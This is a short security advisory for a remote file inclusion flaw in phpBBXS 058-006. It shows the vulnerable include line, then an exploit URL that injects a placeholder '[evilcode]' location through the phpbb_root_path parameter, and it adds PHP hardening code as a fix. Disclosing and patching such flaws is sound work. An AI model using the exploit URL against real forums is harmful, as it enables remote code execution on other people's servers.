phpBBXS 058-006 - RFI


[o] phpBBXS 058-006 Remote File Inclusion Vulnerability
Software : phpBBXS version 058-006
Vendor : http://www.phpbbxs.nl/
Author : NoGe


[o] Vulnerable file
bb_usage_stats/include/bb_usage_stats.php
include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_constants.' . $phpEx);


[o] Exploit
http://localhost/[path]/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=[evilcode]
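To make the defect concrete, here is the vulnerable include beside a hardened version. This is an added example, not phpBBXS's own code and not part of the advisory; the file layout, the `IN_PHPBB` guard (phpBB's own convention for blocking direct script access) and the helper name `safe_include` are assumptions.

```php
<?php
// Added example: vulnerable vs. hardened inclusion (not phpBBXS's own code).

// --- Vulnerable (as in the advisory) ---
// With register_globals enabled, a request parameter named phpbb_root_path
// becomes the variable $phpbb_root_path before this line runs, so include()
// loads whatever location the request names.
// include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_constants.' . $phpEx);

// --- Hardened ---
// 1. Only run when loaded by the application, never as a top-level script.
if (!defined('IN_PHPBB')) {
    http_response_code(403);
    exit('Direct access denied');
}

// 2. Derive the root path from this file's own location, never from input.
//    Assumed layout: this file lives in <root>/bb_usage_stats/include/.
$phpbb_root_path = dirname(__DIR__, 2) . '/';
$phpEx = 'php';

// 3. Resolve the target and confirm it stays under the application root.
//    realpath() returns false for URLs and nonexistent paths, so remote
//    locations are rejected before any include happens.
function safe_include(string $root, string $relative): void
{
    $rootReal = realpath($root);
    $target   = realpath($root . $relative);
    if ($rootReal === false || $target === false
        || strncmp($target, $rootReal . DIRECTORY_SEPARATOR, strlen($rootReal) + 1) !== 0) {
        http_response_code(500);
        exit('Refusing to include a file outside the application root');
    }
    require $target;
}

safe_include($phpbb_root_path, 'bb_usage_stats/includes/bb_usage_stats_constants.' . $phpEx);
```

Pair this with `register_globals=Off` and `allow_url_include=Off` in php.ini so the include path can no longer be supplied by a request at all.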


[o] Publish
http://www.securityfocus.com/bid/20046


Comments

labatterie said…
Thank you for the sensible critique.